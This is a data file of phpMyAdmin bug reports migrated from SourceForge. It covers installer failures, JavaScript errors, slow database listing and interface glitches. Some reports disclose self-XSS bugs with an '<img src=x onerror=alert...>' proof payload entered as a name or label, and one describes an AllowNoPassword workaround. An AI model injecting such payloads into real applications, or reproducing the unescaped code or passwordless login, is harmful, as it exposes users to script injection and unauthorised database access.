As reported in the discussion for http sourceforge.net p phpmyadmin bugs 3673, there is one case where gz compression is not done.
If zlib.output compression = On, we avoid doing compression but this should not apply when saving directly to the server.
Original URL https sourceforge.net p phpmyadmin bugs 4209 Original author lem9 Found in version 4.1.3","bug"
"24444","10601","phpmyadmin reinstaller 1045 error and E Sub process usr bin dpkg returned an error code 1).
PhpMyAdmin installer for Ubuntu 12.X 13.X has problems when reinstalling.
I noticed this bug for several years but never bothered to complain because it just happens if you screw your installation and thought it would be fixed in the meantime given how common phpmyadmin is.
However years passed and it s still there.
Steps to reproduce have a working phpmyadmin installation with mysql admin user and password equal to phpmyadmin ones it should not matter but I just say it) uninstall completely phpmyadmin with synaptic and reinstall, the installer asks whether to delete also the database, reply yes and you get an error asking to abort or retry, abort.
Now try reinstalling and you ll get E Sub process usr bin dpkg returned an error code 1) if you insist you will be able to finally install it but the phpmyadmin database will have empty tables and usr lib phpmyadmin config.inc.php will be emtpy.
So give up installing from package and download phpmyadmin zip file, unzip it and create config directory, create config file and move it at the top layer with correct permissions.
Try to login and you get a 1045 error, this is due to the fact the database phpmyadmin doesn t exist.
Only way I solved this for now is adding cfg[ Servers ][ i][ AllowNoPassword ] = true; which of course isn t such a good idea for production.
Sorry if description is generic but really it s just a metter of trying reinstalling phpmyadmin under Ubuntu and letting all kind of errors happen.
Original URL https sourceforge.net p phpmyadmin bugs 4210 Original author borracho85 Found in version 3.3.7","bug"
"24444","10602","Table disappears if it has the same name as its tablegroup.
I hope my description is understandable English is not my main language).
When you use the grouped collapsed table names in the menu it groups collapses tables on double underscore by default) and you use as example) the next three names event event subtable event subtable2 This collapses in the menu into the group event .
When you click on the group event in the menu, it does not show the table with the same name as the group so here event has disappeared).
On our server we discovered this behavior with some user user tables and it scared the living cr p out of one of my developers.
I tested it today on your demo server in the database menagerie and it happens there too.
I think this behavior is in PMA since the start of the new menu system.
Original URL https sourceforge.net p phpmyadmin bugs 4212 Original author cyberkev Found in version 4.1.3","bug"
"24444","10603","Fatal JavaScript error.
Searching for databases have been getting me random disconects on phpmyadmin since 4.1.1 .
Auth is done through cookie, the server is not local, although phpmyadmin is installed on my local machine.
This server has a lot of databases 6 pages on the default config).
Everytime I search for a database on the list after it finishes searching and show me the results, it will show me the DIV saying Your session has expired.
Please log in again .
Clicking on the Log In link just reload the page.
If I browse to the database this does not happen.
This didn t happen on 4.0.10.
Original URL https sourceforge.net p phpmyadmin bugs 4214 Original author samuelsol Found in version 4.1.6","bug"
"24444","10604","MariaDB 5.5 error in Drizzle detection.
When I moved phpMyAdmin from an Alias Location directive to just a Location directive in Apache, suddenly I got errors with Drizzle.
Error SQL query Edit Edit SHOW VARIABLES LIKE character set results MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near character set results at line 1 I found a formatting error in libraries DatabaseInterface.class.php at Lines 1442 1445 charset result = this >query SHOW VARIABLES LIKE character set results , link ); Correct syntax should be charset result = this >query SHOW VARIABLES LIKE character set results , link ); Original URL https sourceforge.net p phpmyadmin bugs 4215 Original author scorpionstingnz Found in version 4.1.3","bug"
"24444","10605","Status > Monitor JavaScript error.
On Iceweasel Debian 7), I have this error everytime I open Status>Monitor.
What is weird is that it happens only on localhost; I have no problem when connecting to a remote host running phpMyAdmin 4.1.3.
Also, no problem with Chromium on the same machine.
{ exception { mode callers , stack [ { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 377, column , context null, filename jquery jquery.event.drag 2.2.js }, { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 2, column , context null, filename jquery jquery 1.8.3.min.js }, { line 2283, column , context null, filename server status monitor.js }, { line 258, column , context null, filename error report.js } ], useragent Mozilla 5.0 X11; Linux x86 64; rv 17.0) Gecko 20131030 Firefox 17.0 Iceweasel 17.0.10 , incomplete true , uri server status monitor.php?target= }, script name server status monitor.php , pma version 4.1.3 , browser name FIREFOX , browser version 17.0 , user os Linux , server software Apache 2.2.22 Debian) , user agent string Mozilla 5.0 X11; Linux x86 64; rv 17.0) Gecko 20131030 Firefox 17.0 Iceweasel 17.0.10 , locale en , configuration storage enabled , php version 5.4.4 14 deb7u7 , microhistory { pages [ { hash index.php?db= table= server=1 target= token=109f2ef88ffbc4032360b9a7e863893f }, { hash server status.php?db= table= server=1 target= token=109f2ef88ffbc4032360b9a7e863893f , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang en , server 1 , text dir ltr , pma text default tab Browse , pma text left default tab Structure , confirm true } }, { hash server status monitor.php?db= table= server=1 target= token=109f2ef88ffbc4032360b9a7e863893f , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang en , server 1 , text dir ltr , pma text default tab Browse , pma text left default tab Structure , confirm true } } ], current index 3 } } Original URL https sourceforge.net p phpmyadmin bugs 4216 Original author lem9 Found in version 4.1.3","bug"
"24444","10606","Current value not highlighted when browsing foreign values.
When editing a row and browsing foreign values, the current value of the column should be highlighted.
Original URL https sourceforge.net p phpmyadmin bugs 4217 Original author lem9 Found in version 4.1.3","bug"
"24444","10607","Chrome behavior with date fields.
Since phpMyAdmin 4.1, there is a problematic behavior with date fields insert or edit) under Chrome.
For screenshots and details, see http stackoverflow.com questions 20928019 how to defeat input field formatting Original URL https sourceforge.net p phpmyadmin bugs 4218 Original author lem9 Found in version 4.1.3","bug"
"24444","10608","Incorrect key values in foreign key browser.
When browsing foreign key values, the rightmost keyname contains the wrong value for all rows.
Original URL https sourceforge.net p phpmyadmin bugs 4220 Original author lem9 Found in version 4.1.3","bug"
"24444","10609","Bzip2 export cannot be directly imported.
When importing sql files from a phpMyAdmin export, bzip2 doesn t import all the data.
Uncompressed, zip and gzip seem to work, but bzip2 only imports 188 rows from 1408.
Comparing the file from the bzip2 with the uncompressed shows an identical file, so I m guessing something has gone wrong on the import.
There was a problem on 4.1.2 with imports as well no queries were run when importing bzip2) but this seems to be working better although not perfectly) under 4.1.3 PHP 5.5.7 MySQL 5.6.15 CentOS 6.5 Original URL https sourceforge.net p phpmyadmin bugs 4221 Original author noodlesnz Found in version 4.1.3","bug"
"24444","10610","Database list Create database misses collation column.
On the Databases page, when creating a new database, the Collation column is not added to the database list thereunder.
Fixed with Original URL https sourceforge.net p phpmyadmin bugs 4223 Original author mynetx Found in version 4.1.4","bug"
"24444","10611","Table empty name and inuse .
Hi, since version 4.1.X sometime when we click on a database on the left menu, the tables load inside this menu but on the main panel, we have empty name and inuse tag.
See my attachments Original URL https sourceforge.net p phpmyadmin bugs 4224 Original author jfdionne Found in version 4.1.4 Attachment http sourceforge.net p phpmyadmin bugs 4224 attachment View1.png","bug"
"24444","10612","Partition maintenance broken.
Fixed with https github.com phpmyadmin phpmyadmin commit e90abd547729b91b7249155bd683e2c6e18e7fb2 Original URL https sourceforge.net p phpmyadmin bugs 4225 Original author madhuracj Found in version 4.1.0","bug"
"24444","10613","Notice Undefined index pma config loading.
When setting up a new PMA instance without an existing config file, this notice appears at the bottom of the setup index Notice Undefined index pma config loading in phpMyAdmin libraries Config.class.php on line 1883 Original URL https sourceforge.net p phpmyadmin bugs 4226 Original author gphemsley Found in version 4.1.4","bug"
"24444","10614","When editing rows, Actions panel is not at the bottom in Chrome.
If you tick a few rows in a table then click the edit button at the bottom, on the editing page the actions panel the fieldset element with [Save] and then [Go back...] and Go Cancel buttons) is not at the bottom.
It instead appears towards the end, but has one or more rows to edit following that.
Screenshot attached.
Seems to be Chrome only i s okay in Firefox).
When inspecting in Chrome Dev Tools, the actions panel appears to be at the bottom in the source below all the row editing tables, so it could be a Chrome bug.
Though I did see a similar issue on another site that had invalid HTML, so perhaps it s that?
Original URL https sourceforge.net p phpmyadmin bugs 4228 Original author svivian Found in version 4.1.4 Attachment http sourceforge.net p phpmyadmin bugs 4228 attachment pmabug actionspanel.jpg","bug"
"24444","10615","Javascript error in SQL edit window.
To reproduce 1.
Browse a table.
2.
Click [Edit] by the query at the top.
3.
Click Sql History 4.
Click the edit icon next to a query.
5.
Click Go to run the query.
A Javascript error report pops up.
I tried sending it but it failed.
Here s the text from it { exception { mode onerror , message Uncaught TypeError Cannot read property sql query of undefined , stack [ { line 377, func checkSqlQuery , context [ , see confirmQuery ) , , function checkSqlQuery theForm) , { , var sqlQuery = theForm.elements[ sql query ]; , var isEmpty = 1; , var space re = new RegExp \\s ); , if typeof theForm.elements[ sql file ]) != undefined , theForm.elements[ sql file ].value.replace space re, ) !== ) { , return true; ], filename functions.js } ], useragent Mozilla 5.0 X11; Linux i686) AppleWebKit 537.36 KHTML, like Gecko) Chrome 31.0.1650.63 Safari 537.36 , uri querywindow.php?target= }, script name querywindow.php , pma version 4.1.4 , browser name CHROME , browser version 31.0.1650.63 , user os Linux , server software Apache 2.4.6 Ubuntu) , user agent string Mozilla 5.0 X11; Linux i686) AppleWebKit 537.36 KHTML, like Gecko) Chrome 31.0.1650.63 Safari 537.36 , locale en , configuration storage enabled , php version 5.5.3 1ubuntu2.1 , microhistory { pages [ { hash querywindow.php?db=test table=data server=1 target= token=58e0b2723c9dbbd6477c6dea3347bbe3 , params { opendb url db structure.php , safari browser 0 , querywindow height 400 , querywindow width 600 , collation connection utf8mb4 general ci , lang en , server 1 , text dir ltr , pma text default tab Browse , pma text left default tab Structure , confirm true } } ], current index 1 } } Original URL https sourceforge.net p phpmyadmin bugs 4229 Original author svivian Found in version 4.1.4","bug"
"24444","10616","in use displayed for all views in database print view.
Original URL https sourceforge.net p phpmyadmin bugs 4230 Original author lem9 Found in version 4.1.4","bug"
"24444","10617","DATE columns quick edit decrement by one day.
See the comment here https github.com phpmyadmin phpmyadmin commit 86104e86669bab9c9e26cab83e680819db32afe2 commitcomment 5067653 Original URL https sourceforge.net p phpmyadmin bugs 4231 Original author lem9 Found in version 4.1.4","bug"
"24444","10618","User not found after creating the user.
I just got the error message The selected user was not found in the privilege table after creating the user.
1) Click the Users tab, fill out some bogus information with no global privileges selected.
I checked the Create database with same name and grant all privileges checkbox, but that doesn t seem to matter.
2) Click Go; the resulting page shows the overview of all users.
3) Click the Edit privileges link for the new user.
I get taken to the Edit page, but see The selected user was not found in the privilege table at the top of the screen.
I don t know if it s related, but at this point I get two notices and backtraces at the bottom of the screen Notice in .
libraries Util.class.php 1953 Undefined index query Backtrace .
libraries Util.class.php 1859 PMA Util splitURLQuery string ) .
libraries Util.class.php 1319 PMA Util linkOrButton string , string Inline , array, ) .
libraries server privileges.lib.php 2328 PMA Util getMessage NULL, string CREATE USER \ db\ \ \ ;GRANT USAGE ON .
TO \ db\ \ \ WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0;CREATE DATABASE IF NOT EXISTS `db`;GRANT ALL PRIVILEGES ON `db`.
TO \ db\ \ \ ; , ) .
server privileges.php 276 PMA getExtraDataForAjaxBehavior string , string CREATE USER \ db\ \ \ ;GRANT USAGE ON .
TO \ db\ \ \ WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0;CREATE DATABASE IF NOT EXISTS `db`;GRANT ALL PRIVILEGES ON `db`.
TO \ db\ \ \ ; , string , string db , ) Notice in .
libraries Util.class.php 1861 Undefined offset 1 Backtrace .
libraries Util.class.php 1319 PMA Util linkOrButton string , string Inline , array, ) .
libraries server privileges.lib.php 2328 PMA Util getMessage NULL, string CREATE USER \ db\ \ \ ;GRANT USAGE ON .
TO \ db\ \ \ WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0;CREATE DATABASE IF NOT EXISTS `db`;GRANT ALL PRIVILEGES ON `db`.
TO \ db\ \ \ ; , ) .
server privileges.php 276 PMA getExtraDataForAjaxBehavior string , string CREATE USER \ db\ \ \ ;GRANT USAGE ON .
TO \ db\ \ \ WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0;CREATE DATABASE IF NOT EXISTS `db`;GRANT ALL PRIVILEGES ON `db`.
TO \ db\ \ \ ; , string , string db , ) Original URL https sourceforge.net p phpmyadmin bugs 4232 Original author ibennetch Found in version 4.1.5","bug"
"24444","10619","Phpmyadmin popup red boxes undefined.. On any version of phpmyadmin 4.1.x includign latest 4.1.4 I get popup long red boxes at the bottom saying undefined, they have a button as well that says undefined.
It pops up on various pages such as the status page.
version 4.0.x and 3.x do not have the problem.
Software as follows.
Client Firefox ESRv24 Windows 7 Pro SP1 Server FreeBSD 9.2 PHP 5.4.23 FPM Apache 2.4 phpMyAdmin 4.1.4 affects all 4.1.x) Mysql percona 5.5.34.32.0 Using mysqli phpmyadmin side and mysqlnd on php.
Directadmin is installed, phpmyadmin is accessed via a weird proxypassmatch configuration configured by the directadmin custombuild script, this possibly is related to it as I am guessing this is not a widespread bug given its still happening in 4.1.4.
Original URL https sourceforge.net p phpmyadmin bugs 4233 Original author chrcoluk147 Found in version 4.1.4","bug"
"24444","10620","XSS in AJAX confirmation messages.
As reported by Madhura Jayaratne.
Happens when having an IMG tag in a table name or column name.
Try dropping the column from table structure and try dropping or truncating the table from table operations page.
In both cases AJAX confirmation pop up causes XSSes.
Original URL https sourceforge.net p phpmyadmin bugs 4492 Original author lem9 Found in version 4.0.10","bug"
"24444","10621","s attention.png is missing.
Theme Original is missing image themes original img s attention.png It is used by libraries\server status monitor.lib.php and js\server status monitor.js Original URL https sourceforge.net p phpmyadmin bugs 4493 Original author timomoisio Found in version 4.2.6 Attachment http sourceforge.net p phpmyadmin bugs 4493 attachment s attention.png","bug"
"24444","10622","Loading doesn t disappear when stopping replication slave.
On the server replication page, when stopping a configured replication slave thread, the JavaScript Loading indicator does not disappear.
The developer tools Net activity tab shows a redirection from the Ajax request to the normal server replication page.
Cannot verify right now whether this bug applies to 4.1.x or master as well.
Original URL https sourceforge.net p phpmyadmin bugs 4234 Original author mynetx Found in version 4.0.7","bug"
"24444","10623","bug in drag drop import.
There is a bug in drag drop import, feature I added 1. the drop handler is raised, even if we drag some HTML element in PMA 2. if we drop the HTML element, the empty upload status box is raised as no file is actually uploaded) css fix which I think should be there drag drop a sql file which should cause the import to fail.
> click on failed, anchor to view the failure dialog.
Now this dialog can be dragged moved anywhere in UI, however the cursor for the scrollbar in that dialog is also of `move` type, however it should be a `pointer`, PS dont mind the language D Original URL https sourceforge.net p phpmyadmin bugs 4496 Original author mebjas Found in version Latest Git","bug"
"24444","10624","Copy table causes SQL error.
In table operations, when copying a table to a different database, the operation fails with an SQL error for CREATE TABLE.
This happens for some tables, not for all.
Sample structure for reproducing .
8cf74b688d882a9545a651498664de912c7fb659 is the first bad commit commit 8cf74b688d882a9545a651498664de912c7fb659 Author Viduranga Wijesooriya <vpowerrc gmail.com> Date Sat Jan 11 02 27 40 2014 0530 added 1004 Create indexes at the end in SQL export Signed off by Viduranga Wijesooriya <vpowerrc gmail.com> 040000 040000 1cb78160ad121cb0177c896df4cfc787c7ecc36d 33366ed9017c8811a8a31b06ed162be300cd3014 M libraries Original URL https sourceforge.net p phpmyadmin bugs 4235 Original author mynetx Found in version Latest Git","bug"
"24444","10625","1273 Unknown collation utf8mb4 general ci .
Something has changed in v 4.1.0 onwards.
Prior to that I was able to log in to my remote server fine LAMP), now I get 1273 Unknown collation utf8mb4 general ci message.
v 4.0.10 works fine, all versions after fail all versions work fine on my local WAMP system Not sure what else I can tell you Original URL https sourceforge.net p phpmyadmin bugs 4236 Original author trevorwood Found in version 4.1.9","bug"
"24444","10626","Undefined index query.
Split bug report from 4232.
I also get a similar message about query undefined when doing the following 1) From the navigation panel click New to create a new database 2) Enter the name of the database and create it.
You re taken to the page listing all databases.
3) Click your new database.
The page changes to the structure page for the new database, but at the bottom I see Notice in .
libraries Util.class.php 1953 Undefined index query Original URL https sourceforge.net p phpmyadmin bugs 4238 Original author lem9 Found in version Latest Git","bug"
"24444","10627","Missing LIMIT clause for some queries.
With certain queries, I m getting an infinite loop in phpMyAdmin.
I tracked it down using xdebug to the loop at line 2546 in DisplayResults.class.php.
When I put in a break condition if loop count > 1000) break; ), the infinite loops stopped, although the script s output was wrong.
Instead of showing 25 rows, it was showing 1000 rows.
Seems like it wanted to output all 178836 rows in the results on one page; so not a true infinite loop but might as well be.
Here s a query that gives the infinite loop SELECT sum `Size`) as bytes, count `CRC`) as num FROM `backups` GROUP BY `CRC` ORDER BY `num` DESC Here s a query that works fine SELECT Filename, count `CRC`) as num FROM `backups` GROUP BY `CRC` ORDER BY `num` DESC Here s my table structure CREATE TABLE IF NOT EXISTS `backups` `id` int 8) NOT NULL AUTO INCREMENT, `Backup` tinytext NOT NULL, `Filename` text NOT NULL, `Path` text NOT NULL, `Size` int 11) NOT NULL, `ModDate` datetime NOT NULL, `CRC` varchar 8) NOT NULL, `CanDelete` tinyint 1) NOT NULL DEFAULT 0 , PRIMARY KEY `id`), UNIQUE KEY `new id` `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO INCREMENT=302797 ; The table has about 300K rows, as you can see from the auto increment.
phpMyAdmin version is 4.1.5 PHP version is 5.4.22 Platform is Windows 7 64 bit Original URL https sourceforge.net p phpmyadmin bugs 4239 Original author harpercl Found in version 4.1.5","bug"
"24444","10628","demo.phpmyadmin.net.
is dead Firefox can t establish a connection to the server at demo.phpmyadmin.net did you forget to start httpd ?
Original URL https sourceforge.net p phpmyadmin bugs 4240 Original author cybernet2u Found in version Latest Git","bug"
"24444","10629","Confusing dialog when trying to create an already existing user.
The message displayed is An account already exists with the same username but possibly a different hostname.
Are you sure you wish to proceed?
.
The last part with the question makes me look for buttons to reply, so it should be removed.
Original URL https sourceforge.net p phpmyadmin bugs 4241 Original author lem9 Found in version 4.1.5","bug"
"24444","10630","Self XSSes in monitor.
Steps Monitor > settings > add chart > Chose status variables from radio buttons > type variable name as <img src=x onerror=alert 1)> > Chose append unit to data values and type <img src=x onerror=alert 2)> > Click Add this series .
Affected versions 4.0.x, 4.1.x, 4.2.x Problematic line server status monitor.js L905 L911 in QA 4 2) str = serie.unit ?
, PMA messages.strUnit serie.unit) ; and seriesPreview ).append newSeries.label str <br > ); Original URL https sourceforge.net p phpmyadmin bugs 4503 Original author madhuracj Found in version 4.0.10","bug"
"24444","10631","Wildcard containing only db failure in sidebar.
The documentation for only db still mentions that mysql LIKE wildcards are accepted, but using them fails to display properly in the sidebar the wildcards display literally, leaving no usable DB names in the sidebar.
A couple suggestions for how to fix this You could have a single spot in the code check the only db list for wildcards, and if present, expand the list using SHOW DATABASES LIKE ... so that the only db setting can always be assumed to be an array of actual DB names in the rest of the code.
This would also allow you to remove some of the uses of LIKE in the db name matching which will improve speed due to SHOW DATABASES LIKE being faster than SELECT...FROM information schema...LIKE).
You could decide to disallow wildcards in only db and force the user to set the only db config to a list of DB names.
I m using this idiom to work around the bug e.g.
using this dir listing idiom prefix = expected prefix goes here ; cfg[ Servers ][ i][ only db ] = preg replace 00 [0 9a f][0 9a f]) e , chr hexdec \ \1\ )) , preg grep prefix , scandir var lib mysql ))); Yes, that has some short cuts in it e.g.
no check for dir ness for matches and limited substitution for escaped letters), but it works for my needs.
Original URL https sourceforge.net p phpmyadmin bugs 4242 Original author wdavison Found in version 4.1.5","bug"
"24444","10632","Self XSS in charts.
Steps Go to table charts and change X axis label to <img src=x onerror=alert 1)> Affected versions 4.0.x, 4.1.x, 4.2.x Original URL https sourceforge.net p phpmyadmin bugs 4504 Original author madhuracj Found in version 4.0.10","bug"
"24444","10633","Super slow page rendering with tens of thousands of DBs.
I recently upgraded phpmyadmin from 3.x to 4.x in a DB setup that has about 25,000 DBs though only a small number of per page DBs are visible, due to our only db setting), and found that page load times were in the realm of 60 90 seconds each agonizingly slow we run MySQL 5.5, btw).
I traced the cause down to all the counting and selecting against the information schema DB being done for DB names anytime an explicit name isn t mentioned e.g.
LIKE is used) the query took 20, 40, even 60 seconds to complete.
I eventually made enough changes to the code to get page loads down to normal, and will mention some of the things I discovered The only SELECT of information schema s DB names that is quick is an exact match against SCHEMA NAME w o any charset transformation i.e.
no use of BINARY casts).
Even a SELECT using IN db1 , db2 ) is super slow.
Doing SELECT queries with a restricted non super) user is slower than the super user probably due to all the security checks that the super user can avoid) so don t be fooled by any speed tests you run using a root login.
Doing a COUNT ) of DB info in the information schema is just as super slow as a SELECT.
The use of SHOW DATABASES LIKE is quite fast.
Thus, for a general fix, I d recommend that you change the code that does any DB name matching to do a SHOW DATABASES LIKE call, get the list of DB names, and then loop over it with individual DB name SELECTs into information schema.
FYI, the fixes I did were a simpler set of changes that work for our particular site.
If you re curious, here s what I did I changed all the count operations e.g.
getPresence ) calls) into array length operations of the only db array since that is always a full list of the user s tables in our setup).
I removed all BINARY casts in the database name matching code.
I removed all use of LIKE in the database name matching code.
I changed the code path in getDatabasesFull ) that lists all DBs when database isn t specified) into a loop over the only db list of DB names, adding each individual DB lookup into the databases[ db name] array.
Original URL https sourceforge.net p phpmyadmin bugs 4243 Original author wdavison Found in version 4.1.5","bug"
"24444","10634","Advisor complaints about MariaDB 10.x is version less than 5.1.
In advisor The MySQL server version less than 5.1.
You should upgrade, as MySQL 5.1 has improved performance, and MySQL 5.5 even more so.
SQL Server version is 10.0.7 Original URL https sourceforge.net p phpmyadmin bugs 4244 Original author silvy Found in version 4.1.5","bug"
"24444","10635","Unable to select column name by double click.
Open table structure view.
can t select column name by double click.
Type column selection works fine Original URL https sourceforge.net p phpmyadmin bugs 4246 Original author freeman3 Found in version 4.1.4","bug"
"24444","10636","QBE fails to generate LEFT join for InnoDB foreign keys in absence of configuration storage..
Disable phpMyAdmin configuration storage from config.inc.php.
Then try to generate a query in DB QBE between two tables linked with a foreign key constraint.
It fails to generate a LEFT join.
Original URL https sourceforge.net p phpmyadmin bugs 4511 Original author ashut0sh Found in version Latest Git","bug"
"24444","10637","open basedir warnings on export page.
When exporting database, these warninigs are shown on export page Warning in .
libraries tcpdf tcpdf autoconfig.php 96 file exists ) open basedir restriction in effect.
File usr share doc php tcpdf examples images ) is not within the allowed path s) usr share phpmyadmin tmp usr share php proc stat proc meminfo var tmp ) Warning in .
libraries tcpdf tcpdf autoconfig.php 96 file exists ) open basedir restriction in effect.
File usr share doc tcpdf examples images ) is not within the allowed path s) usr share phpmyadmin tmp usr share php proc stat proc meminfo var tmp ) Warning in .
libraries tcpdf tcpdf autoconfig.php 96 file exists ) open basedir restriction in effect.
File usr share doc tcpdf examples images ) is not within the allowed path s) usr share phpmyadmin tmp usr share php proc stat proc meminfo var tmp ) Warning in .
libraries tcpdf tcpdf autoconfig.php 96 file exists ) open basedir restriction in effect.
File usr share doc tcpdf examples images ) is not within the allowed path s) usr share phpmyadmin tmp usr share php proc stat proc meminfo var tmp ) Warning in .
libraries tcpdf tcpdf autoconfig.php 96 file exists ) open basedir restriction in effect.
File var www html tcpdf images ) is not within the allowed path s) usr share phpmyadmin tmp usr share php proc stat proc meminfo var tmp ) Warning in .
libraries tcpdf tcpdf autoconfig.php 96 file exists ) open basedir restriction in effect.
File usr local apache2 htdocs tcpdf images ) is not within the allowed path s) usr share phpmyadmin tmp usr share php proc stat proc meminfo var tmp ) I know that i can fix them by allowing that directories in open basedir but why should i when phpmyadmin doesn t need them?
Original URL https sourceforge.net p phpmyadmin bugs 4247 Original author azurit Found in version 4.1.5","bug"
"24444","10638","phpmyadmin run very slow information schema).
I have the following scenario with 2 servers shared hosting) Linux Server 1 MySQL 5.5 8000 databases Linux Server 2 MySQL 5.6 7000 databases By placing phpMyAdmin 4.xx, the first access is very slow on both servers more than 16 seconds to render the page) and innodb stats on metadata is already OFF.
Enabling debug, which is unable to identify the queries that it performs the information schema, as follows [1f94c8d385c8b4d595d10b6542624c40] => Array [count] => 1 [query] => SELECT `SCHEMA NAME` FROM `INFORMATION SCHEMA`.`SCHEMATA`, select DB first level from SELECT distinct SUBSTRING INDEX SCHEMA NAME, , 1) DB first level FROM INFORMATION SCHEMA.SCHEMATA WHERE TRUE AND `SCHEMA NAME` NOT REGEXP information schema ) t ORDER BY DB first level ASC LIMIT 0, 250) t2 where 1 = locate concat DB first level, ), concat SCHEMA NAME, )) order by SCHEMA NAME ASC [time] => 3.34156107903 [trace] => Array [0] => Array [0] => .
libraries DatabaseInterface.class.php 205 PMA DatabaseInterface > dbgQuery ) [1] => .
libraries DatabaseInterface.class.php 1705 PMA DatabaseInterface >tryQuery ) [2] => .
libraries navigation Nodes Node.class.php 383 PMA DatabaseInterface >fetchResult ) [3] => .
libraries navigation NavigationTree.class.php 211 Node >getData ) [4] => .
libraries navigation NavigationTree.class.php 674 PMA NavigationTree > buildPath ) [5] => .
libraries navigation Navigation.class.php 52 PMA NavigationTree >renderState ) [6] => .
libraries Header.class.php 377 PMA Navigation >getDisplay ) [7] => .
libraries Response.class.php 262 PMA Header >getDisplay ) [8] => .
libraries Response.class.php 275 PMA Response > getDisplay ) [9] => .
libraries Response.class.php 373 PMA Response > htmlResponse ) [10] => .
libraries OutputBuffering.class.php 114 PMA Response response ) [11] => PMA OutputBuffering stop ) ) ) ) [5f54e097676bb853308c7efc720c99f8] => Array [count] => 2 [query] => select COUNT ) from SELECT distinct SUBSTRING INDEX SCHEMA NAME, , 1) DB first level FROM INFORMATION SCHEMA.SCHEMATA WHERE TRUE AND `SCHEMA NAME` NOT REGEXP information schema ) t [time] => 1.7902340889 [trace] => Array [0] => Array [0] => .
libraries DatabaseInterface.class.php 205 PMA DatabaseInterface > dbgQuery ) [1] => .
libraries DatabaseInterface.class.php 1563 PMA DatabaseInterface >tryQuery ) [2] => .
libraries navigation Nodes Node.class.php 406 PMA DatabaseInterface >fetchValue ) [3] => .
libraries navigation NavigationTree.class.php 1072 Node >getPresence ) [4] => .
libraries navigation NavigationTree.class.php 677 PMA NavigationTree > fastFilterHtml ) [5] => .
libraries navigation Navigation.class.php 52 PMA NavigationTree >renderState ) [6] => .
libraries Header.class.php 377 PMA Navigation >getDisplay ) [7] => .
libraries Response.class.php 262 PMA Header >getDisplay ) [8] => .
libraries Response.class.php 275 PMA Response > getDisplay ) [9] => .
libraries Response.class.php 373 PMA Response > htmlResponse ) [10] => .
libraries OutputBuffering.class.php 114 PMA Response response ) [11] => PMA OutputBuffering stop ) ) [1] => Array [0] => .
libraries DatabaseInterface.class.php 205 PMA DatabaseInterface > dbgQuery ) [1] => .
libraries DatabaseInterface.class.php 1563 PMA DatabaseInterface >tryQuery ) [2] => .
libraries navigation Nodes Node.class.php 406 PMA DatabaseInterface >fetchValue ) [3] => .
libraries navigation NavigationTree.class.php 1148 Node >getPresence ) [4] => .
libraries navigation NavigationTree.class.php 678 PMA NavigationTree > getPageSelector ) [5] => .
libraries navigation Navigation.class.php 52 PMA NavigationTree >renderState ) [6] => .
libraries Header.class.php 377 PMA Navigation >getDisplay ) [7] => .
libraries Response.class.php 262 PMA Header >getDisplay ) [8] => .
libraries Response.class.php 275 PMA Response > getDisplay ) [9] => .
libraries Response.class.php 373 PMA Response > htmlResponse ) [10] => .
libraries OutputBuffering.class.php 114 PMA Response response ) [11] => PMA OutputBuffering stop ) ) ) ) Original URL https sourceforge.net p phpmyadmin bugs 4513 Original author j4m3sbr Found in version 4.2.7","bug"
"24444","10639","js error when changing number of columns inside server<status<monitor<settings.
There s a javascript error inside server<status<monitor<settings when you try to change the Chart coulmns.
There error is because there is no method name setsize ) inisde the runtime.charts object.
The object right now is of this type { c0 { title Questions , series [{ label Questions , highlighter { show true}}], nodes [{ dataPoints [{ type statusvar , name Questions }], display differential }], maxYLabel 0}, c1 { title Connections Processes , series [{ label Connections },{ label Processes }], nodes [{ dataPoints [{ type statusvar , name Connections }], display differential },{ dataPoints [{ type proc , name processes }]}], maxYLabel 0}, c2 { title Traffic , series [{ label Bytes sent },{ label Bytes received }], nodes [{ dataPoints [{ type statusvar , name Bytes sent }], display differential , valueDivisor 1024},{ dataPoints [{ type statusvar , name Bytes received }], display differential , valueDivisor 1024}], maxYLabel 0}, c3 { title System CPU Usage , series [{ label Average load }], nodes [{ dataPoints [{ type cpu , name irrelevant }], transformFn cpu linux }], maxYLabel 0}, c4 { title System memory , series [{ label Buffered memory , fill true},{ label Used memory , fill true},{ label Cached memory , fill true},{ label Free memory , fill true}], nodes [{ dataPoints [{ type memory , name Buffers }], valueDivisor 1024},{ dataPoints [{ type memory , name MemUsed }], valueDivisor 1024},{ dataPoints [{ type memory , name Cached }], valueDivisor 1024},{ dataPoints [{ type memory , name MemFree }], valueDivisor 1024}], maxYLabel 0}, c5 { title System swap , series [{ label Cached Swap , fill true},{ label Used Swap , fill true},{ label Free Swap , fill true}], nodes [{ dataPoints [{ type memory , name SwapCached }], valueDivisor 1024},{ dataPoints [{ type memory , name SwapUsed }], valueDivisor 1024},{ dataPoints [{ type memory , name SwapFree }], valueDivisor 1024}], maxYLabel 0}} Original URL https sourceforge.net p phpmyadmin bugs 4248 Original author omerjerk Found in version Latest Git","bug"
"24444","10640","Incorrect number of result rows for SQL with subqueries.
If an SQL query involving subqueries is executed, the number of returned rows shown in a rectangle above the query) is incorrectly counted from the currently selected table database, not from the executed query.
